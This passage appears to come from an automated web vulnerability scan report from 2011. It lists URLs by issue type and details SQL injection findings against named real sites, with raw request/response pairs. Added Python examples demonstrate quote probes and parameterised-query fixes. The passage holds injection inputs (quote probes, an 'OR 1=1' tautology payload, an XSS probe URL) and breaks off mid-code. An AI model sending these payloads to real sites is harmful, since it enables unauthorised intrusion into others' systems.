26.10. http://a3.bing4.com/imagenewsfetcher.aspx

26.11. http://a4.bing4.com/imagenewsfetcher.aspx

26.12. http://ad.doubleclick.net/activity

26.13. http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html

26.14. http://ads.undertone.com/l

26.15. http://api.bing.com/qsonhs.aspx

26.16. http://b.scorecardresearch.com/b

26.17. http://b3.mookie1.com/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3

26.18. http://bing.fansnap.com/la/pi

26.19. http://blog.linode.com/2011/07/13/introducing-nodebalancer/

26.20. http://boston.com/favicon.ico

26.21. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

26.22. http://cache.boston.com/universal/js/twitterwidget.js

26.23. http://cache.specificmedia.com/creative/blank.gif

26.24. http://cdn.stumble-upon.com/css/global_su.css

26.25. http://cdn.turn.com/server/ddc.htm

26.26. http://cgi.ebay.com/favicon.ico

26.27. http://cheetah.vizu.com/a.gif

26.28. http://cm.g.doubleclick.net/pixel

26.29. http://creatives.as4x.tmcs.net/tmsandbox3a.html

26.30. http://digg.com/ajax/tooltip/submit

26.31. http://farecastcom.122.2o7.net/b/ss/farecastcom/1/H.15.1/s76965045684482

26.32. http://feeds.bbci.co.uk/news/rss.xml

26.33. http://fonts.googleapis.com/css

26.34. http://g-pixel.invitemedia.com/gmatcher

26.35. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1052447870/

26.36. http://ibegin.com/

26.37. http://in.getclicky.com/in.php

26.38. http://l.addthiscdn.com/live/t00/250lo.gif

26.39. http://metrics.boston.com/b/ss/nytbglobe/1/H.20.3/s81497499125071

26.40. http://metrics.ticketmaster.com/b/ss/tm-usprod,tm-combinedusprod/1/H.22.1/s82794165948871

26.41. http://metrics.versionone.com/b/ss/vonenewprod/1/H.17/s66275241293478

26.42. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

26.43. http://now.eloqua.com/visitor/v200/svrGP.aspx

26.44. http://odb.outbrain.com/utils/ping.html

26.45. http://pixel.invitemedia.com/admeld_sync

26.46. http://pixel.quantserve.com/seg/r

26.47. http://profile.live.com/badge

26.48. http://puma.vizu.com/cdn/00/00/21/04/smart_tag.js

26.49. http://r.turn.com/server/pixel.htm

26.50. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1462300313/INTRO/boston/default/empty.gif/726348573830334b61734941426a4977

26.51. http://rover.ebay.com/rover/1/711-53200-19255-0/1

26.52. http://rt.legolas-media.com/lgrt

26.53. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEY7LQDIPC0AyoFcNoAAAEyBWzaAAAP

26.54. http://safebrowsing.clients.google.com/safebrowsing/downloads

26.55. http://segment-pixel.invitemedia.com/pixel

26.56. http://srx.main.ebayrtm.com/rtm

26.57. http://static.ak.fbcdn.net/connect/xd_proxy.php

26.58. http://stubhub-www.baynote.net/baynote/tags3/common

26.59. http://stubhub.tt.omtrdc.net/m2/stubhub/mbox/standard

26.60. http://tag.admeld.com/ad/js/610/bostonglobe/728x90/bg_1064637_61606218

26.61. http://themes.googleusercontent.com/font

26.62. http://umfcluj.ro/js/jquery.validate.js

26.63. http://wa.stubhub.com/b/ss/stubhub/1/H.22.1/s88119992504362

26.64. http://www.adminitrack.com/

26.65. http://www.atlassian.com/software/jira

26.66. http://www.axosoft.com/

26.67. http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html

26.68. http://www.clickmanage.com/events/clickevent.aspx

26.69. http://www.facebook.com/plugins/like.php

26.70. http://www.factset.com/

26.71. http://www.google-analytics.com/__utm.gif

26.72. http://www.googleadservices.com/pagead/conversion/1052447870/

26.73. http://www.ibegin.com/media/site/images/logo.gif

26.74. http://www.intelex.com/landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx

26.75. http://www.linode.com/index.cfm

26.76. http://www.livedrive.com/

26.77. http://www.myspace.com/favicon.ico

26.78. http://www.netlogiq.ro/js/jquery.validate.js

26.79. http://www.numarasoftware.com/welcome/service_desk.aspx

26.80. http://www.rallydev.com/js/scriptaculous.js

26.81. http://www.res-x.com/ws/r2/Resonance.aspx

26.82. http://www.seapine.com/ttpro.html

26.83. http://www.stubhub.com/content/getPromoContent

26.84. http://www.stumbleupon.com/submit

26.85. http://www.techexcel.com/products/devsuite/devteststudio.html

26.86. http://www.ticketmaster.com/event/000043582C516D43

27. Cacheable HTTPS response

27.1. https://manager.linode.com/session/forgot_save/%22%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E

27.2. https://manager.linode.com/session/forgot_save/N

27.3. https://oas.support.discoverbing.com/error.aspx

27.4. https://support.discoverbing.com/Default.aspx

27.5. https://support.microsoft.com/oas/default.aspx

28. HTML does not specify charset

28.1. http://ad.doubleclick.net/adi/N1558.NetMining/B5146585.127

28.2. http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html

28.3. http://asset0.zendesk.com/external/zenbox/v2.1/loading.html

28.4. http://b3.mookie1.com/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3

28.5. http://b3.mookie1.com/2/ticketmaster/172548/11408426983@x01

28.6. http://b3.mookie1.com/2/ticketmaster/AirCanadaCentre/11408426983@x01

28.7. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01

28.8. http://b3.mookie1.com/2/ticketmaster/minorcat/1/11408426983@x02

28.9. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1627503762@x96

28.10. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1936689153@x96

28.11. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1@x96

28.12. http://corporate.everydayhealth.com/favicon.ico

28.13. http://creatives.as4x.tmcs.net/tmsandbox3a.html

28.14. http://i3.onlinehelp.microsoft.com/areas/onlinehelp/content/styles/bing/OnlineHelp_GC.css

28.15. http://majornelson.com/favicon.png

28.16. http://now.eloqua.com/visitor/v200/svrGP.aspx

28.17. http://odb.outbrain.com/utils/ping.html

28.18. http://tag.admeld.com/ad/iframe/610/bostonglobe/160x600/bg_1064637_61606216

28.19. http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228

28.20. http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606228

28.21. http://tm-web2.rondavu.com/com/rondavu/wt/module/static/rondavu_remote.html

28.22. http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route

28.23. http://www.bnymellon.com/earnings.html

28.24. http://www.builtritecc.com/

28.25. http://www.gamestop.com/JavaScript/CertonaTable.htm

28.26. http://www.seapine.com/ttpro.html

29. Content type incorrectly stated

29.1. http://a0.twimg.com/profile_images/534697216/MoMA_Twitter_Icon4_normal.gif

29.2. http://a1.twimg.com/profile_images/136003673/bcom_72x72_bigger_normal.gif

29.3. http://admeld.lucidmedia.com/clicksense/admeld/match

29.4. http://answers.microsoft.com/en-us/Site/SetTimeZoneOffset

29.5. http://answers.microsoft.com/en-us/site/resources

29.6. http://api.twitter.com/1/statuses/user_timeline.json

29.7. http://b3.mookie1.com/2/ticketmaster/minorcat/1/11408426983@x02

29.8. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1627503762@x96

29.9. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1936689153@x96

29.10. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1@x96

29.11. http://b3.mookie1.com/favicon.ico

29.12. http://bing.fansnap.com/ejs_templates/seats_page/known_tooltip.ejs

29.13. http://bing.fansnap.com/ejs_templates/seats_page/ticket_sets/new_base/marker/photo_sec_none.ejs

29.14. http://bing.fansnap.com/favicon.ico

29.15. http://bing.fansnap.com/seats/ajax/get_vfs_data

29.16. http://charts.edgar-online.com/ext/charts.dll

29.17. http://i3.onlinehelp.microsoft.com/areas/onlinehelp/content/styles/bing/OnlineHelp_GC.css

29.18. http://investor.realnetworks.com/common/images/icon_share.gif

29.19. http://media.gamehouse.com/7/images/favicon.ico

29.20. http://mobile.ebay.com/wp-content/themes/platformpro/images/iconMobileWeb_171x171.png

29.21. http://mobile.ebay.com/wp-content/themes/platformpro/images/imgSubPageContBG.gif

29.22. http://news.google.com/news/xhr/eit

29.23. http://now.eloqua.com/visitor/v200/svrGP.aspx

29.24. http://rac.custhelp.com/ci/browserSearch/desc/http%3A%2F%2Frac.custhelp.com%2Fapp%2Fanswers%2Flist%2Fkw%2F%7BsearchTerms%7D/Support+Home+Page+Search/Support+Home+Page+Search/images%2Ficons%2FSearch16.png

29.25. http://rad.msn.com/ADSAdClient31.dll

29.26. http://real.custhelp.com/ci/browserSearch/desc/http%3A%2F%2Freal.custhelp.com%2Fapp%2Fanswers%2Flist%2Fkw%2F%7BsearchTerms%7D/Support+Home+Page+Search/Support+Home+Page+Search/images%2Ficons%2FSearch16.png

29.27. http://realnetworksrealarca.tt.omtrdc.net/m2/realnetworksrealarca/mbox/standard

29.28. http://res.mobileweb.ebay.com/nbinternal/nbblank.gif

29.29. http://sales.liveperson.net/hcp/html/mTag.js

29.30. http://sharethis.com/favicon.ico

29.31. http://stubhub-www.baynote.net/baynote/tags3/common

29.32. http://stubhub.tt.omtrdc.net/m2/stubhub/mbox/standard

29.33. http://superpass.custhelp.com/ci/browserSearch/desc/http%3A%2F%2Fsuperpass.custhelp.com%2Fapp%2Fanswers%2Flist%2Fkw%2F%7BsearchTerms%7D/Support+Home+Page+Search/Support+Home+Page+Search/images%2Ficons%2FSearch16.png

29.34. http://support.microsoft.com/library/images/support/en-AU/askcasey_Btn.gif

29.35. http://support.microsoft.com/library/images/support/en-AU/askcasey_topqa.gif

29.36. https://support.microsoft.com/library/images/support/en-US/IE9_BG-img.jpg

29.37. http://verify.authorize.net/anetseal/images/secure90x72.gif

29.38. http://video.msn.com/services/user/info

29.39. http://waypointlivingspaces.com/sites/default/files/waypoint_favicon.ico

29.40. http://www.atlassian.com/favicon.ico

29.41. http://www.cesal.ro/js/globalizationro-RO.js

29.42. http://www.factset.com/files/xmlfeeds/current.fds

29.43. http://www.fansnap.com/favicon.ico

29.44. http://www.google.com/search

29.45. http://www.googlelabs.com/show_app_thumbnail

29.46. http://www.mookie1.com/favicon.ico

29.47. http://www.netlogiq.ro/ajaxpro/Layout,App_Web_glwxmlys.ashx

29.48. http://www.rallydev.com/favicon.ico

29.49. http://www.res-x.com/ws/r2/Resonance.aspx

29.50. http://www.seapine.com/favicon.ico

29.51. http://www.stubhub.com/content/getPromoContent

29.52. http://www.stubhub.com/favicon.ico

30. Content type is not specified

31. SSL certificate



1. SQL injection
There are 4 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://cm.g.doubleclick.net/pixel [id cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The id cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Note that in the request/response pair recorded below neither response body contains an error message: both are 302 redirects to tag.admeld.com, and the only difference is the Location query string (google_error=0 for the single-quote probe versus an external_user_id and google_cver=1 for the doubled quote). That is consistent with the Tentative confidence rating; treat the finding as unconfirmed until the difference can be reproduced and attributed to database behaviour rather than to the cookie-matching logic the Server header advertises.
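As an added example, not part of the scanner report or of any scanned site's code, the following Python script reproduces the differential probe described in this Issue detail (and again under 1.2) alongside the parameterised-query remediation from the Issue remediation text: a query built by string concatenation, the same query with a bound placeholder, the single-quote / doubled-quote check run against each, and a quote-based breakout showing why the concatenated form matters. It uses an in-memory SQLite database constructed here as a stand-in for the MySQL back end the report fingerprints; the table name `pages`, its columns and the stored row are assumptions for illustration, and only the sample value mirrors the t parameter from finding 1.2.

```python
import sqlite3

# Sample row, constructed for this example. The value mirrors the t parameter
# probed in finding 1.2; the table and column names are assumptions.
SAMPLE_T = "Medicina-dentara-Oferta-educationala"


def fresh_db():
    """In-memory SQLite database standing in for the MySQL back end."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (t TEXT PRIMARY KEY, body TEXT)")
    conn.execute("INSERT INTO pages VALUES (?, ?)", (SAMPLE_T, "ok"))
    return conn


def lookup_concatenated(conn, t):
    """Vulnerable: t is spliced into the SQL text, so a quote inside t is
    read as SQL syntax instead of as data."""
    sql = "SELECT body FROM pages WHERE t = '" + t + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterised(conn, t):
    """Safe: the query structure is fixed first and the value bound second;
    the driver never re-parses t as SQL, whatever it contains."""
    return conn.execute("SELECT body FROM pages WHERE t = ?", (t,)).fetchall()


def quote_probe(lookup, base=SAMPLE_T):
    """The scanner's differential check: append one quote, then two.

    Returns (errored_on_one_quote, errored_on_two_quotes). A concatenated
    query fails on the stray quote but parses '' as an escaped quote, so it
    yields (True, False); a parameterised query yields (False, False).
    """
    conn = fresh_db()
    outcome = []
    for suffix in ("'", "''"):
        try:
            lookup(conn, base + suffix)
            outcome.append(False)
        except sqlite3.DatabaseError:
            outcome.append(True)
    return tuple(outcome)


def boundary_breakout(lookup):
    """Why the probe matters: close the literal and append a tautology.
    The concatenated query returns every row; the parameterised query
    returns nothing because the whole string is compared as data."""
    return lookup(fresh_db(), "x' OR '1'='1")


if __name__ == "__main__":
    for name, fn in (("concatenated", lookup_concatenated),
                     ("parameterised", lookup_parameterised)):
        print(name, "probe:", quote_probe(fn),
              "breakout:", boundary_breakout(fn))
```

The probe only tells you that a quote changes how the back end parses the request; as the 1.1 responses above show, a differing response is not by itself a database error, so confirm with the error text or a behavioural difference (such as the breakout above) before rating the finding.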

Request 1

GET /pixel?google_nid=admeld&google_cm&google_sc&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=832&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: cm.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228?t=1311108266616&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e'

Response 1 (redirected)

HTTP/1.1 302 Found
Location: http://tag.admeld.com/match?admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=832&admeld_call_type=redirect&google_error=0
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Tue, 19 Jul 2011 20:47:12 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 354
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://tag.admeld.com/match?adme
...[SNIP]...

Request 2

GET /pixel?google_nid=admeld&google_cm&google_sc&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=832&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: cm.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228?t=1311108266616&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e''

Response 2

HTTP/1.1 302 Found
Location: http://tag.admeld.com/match?admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=832&admeld_call_type=redirect&external_user_id=CAESEEm-rSLvlOjzT4MOGrRtRVA&google_cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Tue, 19 Jul 2011 20:47:13 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 402
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://tag.admeld.com/match?adme
...[SNIP]...

1.2. http://umfcluj.ro/Detaliu.aspx [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /Detaliu.aspx

Issue detail

The t parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the t parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. Note that hiding the error page only removes the signal this check relies on; the query itself still incorporates the t parameter as SQL text, so it should be rewritten to pass the value as a bound parameter.

Request 1

GET /Detaliu.aspx?t=Medicina-dentara-Oferta-educationala' HTTP/1.1
Host: umfcluj.ro
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://umfcluj.ro/lista.aspx?t=Studenti-actuali-Prezentare
Cookie: ASP.NET_SessionId=nm2p4tbhojuu3jyfqb310euy; __utma=234819994.717153536.1311096678.1311096678.1311096678.1; __utmb=234819994.1.10.1311096678; __utmc=234819994; __utmz=234819994.1311096678.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:37:31 GMT
Content-Length: 6426

<html>
<head>
<title>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''Medicina-dentara-Oferta-educationala'' &nbsp;group by YEAR(StartDate), MONTH(StartDa' at line 4</titl
...[SNIP]...

Request 2

GET /Detaliu.aspx?t=Medicina-dentara-Oferta-educationala'' HTTP/1.1
Host: umfcluj.ro
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://umfcluj.ro/lista.aspx?t=Studenti-actuali-Prezentare
Cookie: ASP.NET_SessionId=nm2p4tbhojuu3jyfqb310euy; __utma=234819994.717153536.1311096678.1311096678.1311096678.1; __utmb=234819994.1.10.1311096678; __utmc=234819994; __utmz=234819994.1311096678.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:37:34 GMT
Content-Length: 59690


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...

1.3. http://umfcluj.ro/lista.aspx [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /lista.aspx

Issue detail

The t parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the t parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. As with 1.2, suppressing the error page does not remove the injection; the t parameter should be bound as a query parameter rather than concatenated into the SQL text.
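
The behaviour reported for 1.2 and 1.3 (a bare ' breaks the query, '' is accepted) reproduced against a constructed in-memory table, with the concatenating lookup beside a parameterised one. This is an added example and not the site's code; sqlite3 stands in for MySQL because the quote-doubling rule inside a string literal is the same in both, and the table layout, the column names and the quote_probe helper are assumptions.

```python
import sqlite3

# Constructed stand-in for the site's content table. sqlite3 is used because
# it ships with Python; the rule that matters is the same in MySQL: inside a
# single-quoted literal, '' is one literal quote and a lone ' ends the literal.
_conn = sqlite3.connect(":memory:")
_conn.execute("CREATE TABLE page (t TEXT, title TEXT)")
_conn.executemany("INSERT INTO page VALUES (?, ?)", [
    ("Admitere-Prezentare", "Admitere"),
    ("Medicina-dentara-Oferta-educationala", "Medicina dentara"),
])


def lookup_concat(t):
    """Vulnerable: the t parameter is spliced into the SQL text.
    Returns (status, payload) the way the page does: '500' with the raw
    database error, or '200' with the matching titles."""
    sql = "SELECT title FROM page WHERE t = '" + t + "'"
    try:
        rows = _conn.execute(sql).fetchall()
    except sqlite3.Error as err:
        return ("500", str(err))          # the error text leaks, as in the report
    return ("200", [row[0] for row in rows])


def lookup_param(t):
    """Fixed: the value is bound as a parameter and is never parsed as SQL."""
    rows = _conn.execute("SELECT title FROM page WHERE t = ?", (t,)).fetchall()
    return ("200", [row[0] for row in rows])


def quote_probe(lookup, value):
    """Replay the scanner's check: append one quote, then two.
    True means the endpoint behaves like string-context SQL injection
    (error on ', no error on '')."""
    status_one, _ = lookup(value + "'")
    status_two, _ = lookup(value + "''")
    return status_one == "500" and status_two == "200"


if __name__ == "__main__":
    for name, fn in (("concat", lookup_concat), ("param", lookup_param)):
        print(name, "quote probe:", quote_probe(fn, "Admitere-Prezentare"))
    # Beyond the error message: the same flaw lets a tautology return every row.
    print(lookup_concat("x' OR '1'='1"))
```

The probe returns True for lookup_concat and False for lookup_param even though both are reached through the same page, which is the point: binding the value closes the flaw, whereas a friendlier error page would leave it in place and merely blind the scanner. The tautology call at the end is why the Severity is rated High rather than as an information leak.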

Request 1

GET /lista.aspx?t=Admitere-Prezentare' HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.1.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:13:57 GMT
Content-Length: 6990

<html>
<head>
<title>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ro-RO'<br>    WHERE Type = 'Admit
...[SNIP]...

Request 2

GET /lista.aspx?t=Admitere-Prezentare'' HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.1.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:13:59 GMT
Content-Length: 78615


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Universitatea de Medicina si Farmacie Iuliu Hatieganu, Cluj-Napoca</title>
<meta n
...[SNIP]...

1.4. http://www.facebook.com/plugins/like.php [datr cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The datr cookie appears to be vulnerable to SQL injection attacks. The payloads 30846501'%20or%201%3d1--%20 and 30846501'%20or%201%3d2--%20 were each submitted in the datr cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In the two responses below the only material difference is whether the page's stylesheet is inlined or linked (Content-Length 25038 against 6617); section 2 shows the same endpoint returning the same two variants for a different pair of payloads, which points to front-end variation rather than to query logic.
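
A way to apply the manual-review advice above, as an added example (not Burp's logic or Facebook's code): repeat the baseline, always-true and always-false requests several times and accept a finding only when each set of responses is stable, the always-true responses match the baseline, and the always-false responses differ. Two constructed backends are compared: one that concatenates the cookie into SQL (sqlite3 standing in for a real database) and one that ignores its input but alternates between the inline-stylesheet and linked-stylesheet variants seen in the responses here. The fetch interface, the cookie value and the hex-id masking expression are assumptions. The same check applies unchanged to the difference-based LDAP test in section 2.

```python
import re
import sqlite3

BASE = "c0ffee"                                 # constructed cookie value
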